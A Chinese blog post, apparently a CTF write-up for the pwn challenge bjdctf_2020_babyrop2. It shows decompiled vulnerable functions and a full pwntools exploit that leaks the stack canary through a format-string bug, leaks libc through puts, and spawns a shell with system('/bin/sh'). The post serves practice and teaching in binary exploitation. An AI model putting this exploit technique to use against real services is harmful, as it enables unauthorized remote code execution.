加载头像

bjdctf_2020_babyrop2

Ubuntu 16

0x01

checksec

1
2
3
4
5
6
[*] '/home/zelas/Desktop/pwn/bjdctf_2020_babyrop2/bjdctf_2020_babyrop2'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found				//Canary保护
    NX:       NX enabled				//栈不可执行
    PIE:      No PIE (0x400000)

IDA

gift()

1
2
3
4
5
6
7
8
9
10
11
12
13
unsigned __int64 gift()
{
  char format[8]; // [rsp+0h] [rbp-10h] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("I'll give u some gift to help u!");
  __isoc99_scanf("%6s", format);			//格式化字符串
  printf(format);							//
  puts(byte_400A05);
  fflush(0LL);
  return __readfsqword(0x28u) ^ v2;
}

vuln()

1
2
3
4
5
6
7
8
9
10
unsigned __int64 vuln()
{
  char buf[24]; // [rsp+0h] [rbp-20h] BYREF
  unsigned __int64 v2; // [rsp+18h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("Pull up your sword and tell me u story!");
  read(0, buf, 0x64uLL);			//read()函数存在栈溢出漏洞
  return __readfsqword(0x28u) ^ v2;
}

0x02

思路 ret2libc

1.利用printf泄露canary

​ 计算偏移

​ canary 在rbp-0x8

​ 在printf处下断点

pwndbg> p $rbp-0x8

$1 = (void *) 0x7fffffffdc38

pwndbg> fmtarg 0x7fffffffdc38
The index of format argument : 7 ("\%6$p")

2.利用read()泄露libc

3.计算system()和/bin/sh

3.再次溢出执行system()

0x03

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *

context(arch='amd64', os='linux', log_level='debug')
io = remote('node4.buuoj.cn', 27318)
path = './bjdctf_2020_babyrop2'
libc = ELF('./libc-2.23.so')
# io = process([path])
elf = ELF(path)
io.recv()
padding = 0x20 - 0x8
payload = flat(b'%7$p')
io.sendline(payload)
canary = int(io.recv(18), 16)

print('[+] Canary -->', hex(canary))
pop_rdi_ret = 0x400993  # pop rdi ; ret
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
payload1 = flat(b'a'*padding, canary, b'a'*0x8, pop_rdi_ret, puts_got, puts_plt, main)
delims2 = b'Pull up your sword and tell me u story!\n'
io.sendlineafter(delims2, payload1)


puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print('[+] puts_addr -->', hex(puts_addr))

libc_base = puts_addr - libc.symbols['puts']
system = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh\x00'))
print('[+] libc_base -->', hex(libc_base))
print('[+] system -->', hex(system))
print('[+] bin_sh -->', hex(bin_sh))

io.recv()
io.sendline(payload)
io.recv()
payload2 = flat(b'a'*padding, canary, b'a'*0x8, pop_rdi_ret, bin_sh, system)
io.sendline(payload2)
io.interactive()

评论
匿名评论隐私政策
✅ 你无需删除空行,直接评论以获取最佳展示效果
avatar
这有关于运维、开发、后端相关的问题和看法。
相信你可以在这里找到对你有用的知识教程

Zelas2Xerath

技术苑
公告
2024/10/1-跟进上游更新
.NET1AMD1AWX1ChinaSkills2DIY1DirectX1GPU1IDA1KVM1Linux1Markdown1Office1Openwrt8Potplayer1Pwn1Python1RHCE1RHCSA1Redhat2Runtimes4Ryzen1Windows12ansible1cpu3eNSP1hexo2idm1iperf1pip1pwn1python1云计算2显示器1样题2职业技能大赛2虚拟化1装机3超频2配置单2金砖2
归档
网站资讯
文章总数 :
54
建站天数 :
全站字数 :
85.2k
总访客数 :
总访问量 :
最后更新 :
引用到评论
随便逛逛博客分类文章标签
复制地址关闭热评深色模式轉為繁體